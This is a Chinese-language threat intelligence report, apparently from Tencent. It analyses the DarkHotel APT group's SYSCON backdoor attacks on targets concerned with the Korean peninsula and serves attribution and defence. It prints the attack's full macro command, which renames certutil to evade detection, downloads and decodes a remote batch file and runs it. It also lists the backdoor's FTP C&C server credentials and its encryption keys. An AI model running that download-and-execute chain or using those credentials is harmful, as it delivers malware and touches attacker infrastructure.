DarkHotel(黑店)APT組織針對朝鮮半島的精確打擊行動
一、背景
騰訊御見威脅情報中心曾在9月底釋出了《DarkHotel APT組織揭祕:針對高階商務人士、政要人物的精準攻擊已持續8年》,分析報告提到的後門程式SYSCON/SANNY是專門針對朝鮮半島相關的政治目標進行攻擊的惡意檔案,其主要攻擊目標為朝鮮半島相關的重要政治人物或者要害部門,偶爾也會針對東南亞等國進行攻擊。
通過分析發現,該後門跟DarkHotel的TTPs相吻合,因此我們把該後門歸結為DarkHotel(黑店)APT組織。該後門從2017年下半年開始活躍,並且對多個目標進行了攻擊活動,而該後門的最早的攻擊歷史可以追溯到2012年。
騰訊御見威脅情報中心對該後門進行了長期跟蹤,發現 該後門一直以來的特色就是使用FTP協議進行C&C通訊,並且有很強的躲避技術和繞UAC技術 。而最新版本的後門採用了多階段執行、雲控、繞最新UAC等技術,使得攻擊更加的隱蔽和難以發現。
二、最新活動分析
騰訊御見威脅情報中心在2018年8月捕獲到兩個疑似APT的攻擊樣本,經過對樣本的深入分析和騰訊御見威脅情報平臺的關聯分析,確認了該次攻擊屬於DarkHotel的SYSCON後門。
1.攻擊誘餌
本次攻擊活動,依然採用最常見的魚叉攻擊的方式,攻擊的誘餌有兩個,均和朝鮮半島問題相關。
誘餌一:Predict what’s next after Singapore summit
誘餌二:Pompeo tells China continued North Korea sanctions enforcement needed
2.整體攻擊流程:
3.Dropper分析
本次攻擊,使用了最為傳統的巨集程式碼。為了誘使被攻擊者開啟巨集,特意將誘餌文件中的字型修改成非常淺的顏色使使用者無法閱讀,而啟用巨集後會顯示為方便閱讀的黑色。
除此,與以往的攻擊相比,本次攻擊的大部分程式碼放到雲端,在VBA指令碼中只保留非常簡單的幾行程式碼,把以往在VBA中的大部分程式碼被放到 ofollow,noindex" target="_blank">http://bluemountain.1apps.com/1.txt 中,通過將其下載並存為1.bat執行。雲控化的安裝過程使得木馬的傳播和感染過程靈活可控。
巨集程式碼:
C:\Windows\system32\cmd.exe /q /c copy /Y %windir%\System32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f http://bluemountain.1apps.com/1.txt && ct -decode -f 1.txt 1.bat && del /f /q 1.txt && 1.bat
有意思的是,VBA將Microsoft Windows certutil.exe程式複製到%temp%目錄,並命名為ct.exe。以此來逃避一些安全軟體的檢測規則。
而上面url的內容,是儲存著假冒的PEM編碼的SSL證書,然後使用certutil.exe來解碼其中的base64程式碼(去除BEGIN和END標記)。
解碼後的1.bat的內容如下:
1.bat的主要功能是主要根據系統型別下載cab檔案到本地展開執行,實現木馬的安裝。與以往不同的是,本次攻擊將CAB壓縮包也存放在雲端,並將CAB壓縮包檔案分為兩個放在雲端,由bat指令碼判斷本地系統後按需進行下載。
而以往的攻擊樣本則是將x64、x86兩種版本木馬程式放在同一個cab壓縮包中且直接存放在誘餌文件中,無需聯網安裝。其他安裝過程包括繞過UAC方式等和以往相同。
4.後門核心功能分析
本次使用的SYSCON後門依然使用FTP協議進行控制,這也是該後門最大的特點,木馬首先會讀取同目錄下的同名ini檔案,並將其解密得到C&C的地址,以及使用的FTP使用者名稱和密碼。這種通過ini檔案來控制C&C地址的做法在DarkHotel組織的多個木馬中用到。
解密出配置資訊後,通過執行systeminfo和tasklist命令來收集系統資訊,收集後輸出到temp.ini,並壓縮上傳到C&C中,上傳的檔名格式為to + 計算機名 + 時間。
FTP資訊為:
FTP Server:ftp.byethost7.comUserName:b7_22605488PASS WORD:123qweASD!@#
上傳systeminfo 、tasklist結果到C&C,然後查詢C&C上的名為to everyone 的檔案,讀取內容解密後得到命令進行命令分發。
相關命令如下:
三、關聯分析
1.本次木馬和SYSCON關係
本次木馬與SYSCON無論是核心程式碼結構,還是部分加密方式均有極大相似性,都與SYSCON木馬有著極大的相似性,可以確定此木馬就是SYSCON。
C&C的ini檔案加密演算法對比(下圖為SYSCON),為Base64加密 :
本次發現的木馬 :
值得注意的是加密使用的金鑰已經發生改變,SYSCON之前使用的金鑰為:
KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv
而本次攻擊使用的金鑰已經更新為:
bVICrm9xaJ3tZX-Tj6OpFc7Asi4lvuhfw0oQ5GKeEHYgD1MLRn=BU/dqNP2kWyz8S
之前的SYSCON的金鑰:
更新後的金鑰:
從木馬獲取到本機資訊後打包壓縮上傳的相關程式碼來分析可見,核心功能程式碼並未改變,但大部分API函式改為了動態呼叫。
壓縮上傳相關程式碼(下圖為SYSCON):
本次發現的樣本:
因此我們確認,該後門即為SYSCON後門。
2.SYSCON和KONNI關係
經過深入的分析發現, 該後門跟另一款針對朝鮮等政治人物攻擊的後門KONNI有著非常大的相同點 ,因此我們判斷,這兩款後門,屬於一個攻擊組織。
金鑰的關聯性:上文提到,SYSCON木馬編碼加密使用的金鑰為:
KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv
該金鑰同時被使用到了KONNI的誘餌文件的編碼加密中:
巨集程式碼的關聯性:我們從騰訊御見威脅情報庫中,找到了之前被其他安全廠商曝光過的KONNI和SYSCON的樣本:
確認為KONNI樣本:
834d3b0ce76b3f62ff87b7d6f2f9cc9b 12 things Trump should know about North Korea.doc
確認為SYSCON樣本:
a0d66962dfc35b0cf49442f8ee6062d3 3131.doc
經過比較發現,他們的攻擊文件中的巨集程式碼,幾乎完全一樣:
此外無論是本次攻擊所用的樣本,還是老版本的SYSCON或者KONNI木馬,他們絕大多數的攻擊載體為word檔案,通過在word文件中嵌入惡意巨集程式碼來實現攻擊。為了誘使使用者啟用巨集,該組織最常用的方式就是將字型修改成非常淺的顏色使使用者無法閱讀,而啟用巨集後會將字型顏色改成黑色。
本次攻擊文件中修改字型顏色的VBA程式碼:
KONNI的修改字型的程式碼:
攻擊物件的關聯性從攻擊的誘餌檔案來看,無論是SYSCON還是KONNI,語言一般是英文,偶爾有誘餌採用俄文。而誘餌內容均為和朝鮮相關。
3.KONNI和DarkHotel關係
繼續從騰訊御見威脅情報樣本庫裡查詢樣本,發現某個KONNI的誘餌檔案(b9ba36607ea379da4b6620c4e3fce2ca)內容如下:
PYONGYANG E-MAIL LISTS –April 2017
而確認為Darkhotel的Inexsmar後門的某一次誘餌檔案(9d1f784766ec154645bdf33cad211048)為:
PYONGYANG E-MAIL LISTS –September2016
可以看到,兩個誘餌檔案無論是標題和內容都極其相似。
同時,我們可以看到,兩個誘餌的文件的作者,均為Divya Jacob。
而此外,兩個檔案都為scr格式,並且都偽裝成了word的圖示,且執行後都會執行相應的docx文件。因此從攻擊方式來看也非常相似。
綜上,我們判斷,KONNI跟DarkHotel也存在一定的關聯。
四、總結
SYSCON後門是專門針對朝鮮半島問題相關的政治人物的特種木馬,只要跟朝鮮半島相關的人物和單位/部門,均為他的攻擊目標。
雖然暫未發現該木馬活躍在中國境內,但是鑑於中國和朝鮮半島特殊又密切的關係,不排除該後門會對中國相關領域關鍵人物和單位進行攻擊,騰訊御見威脅情報中心提醒有關人員切不可掉以輕心。
此外,經過溯源和關聯發現,該後門跟KONNI和Inexsmar後門都存在千絲萬縷的關係,經過詳細技術分析,我們把該後門歸屬到DarkHotel(黑店)APT組織。
五、安全建議
謹慎連線公用的WiFi網路。若必須連線公用WiFi網路,建議:
不要進行可能洩露機密資訊或隱私資訊的操作,如收發郵件、IM通訊、銀行轉賬等;
不要在連線公用WiFi時進行軟體升級操作;
不要開啟不明來源的郵件附件;
及時打系統補丁和重要軟體的補丁;
使用防毒軟體防禦可能的病毒木馬攻擊。
使用騰訊御界高階威脅檢測系統。御界高階威脅檢測系統,是基於騰訊反病毒實驗室的安全能力、依託騰訊在雲和端的海量資料,研發出的獨特威脅情報和惡意檢測模型系統。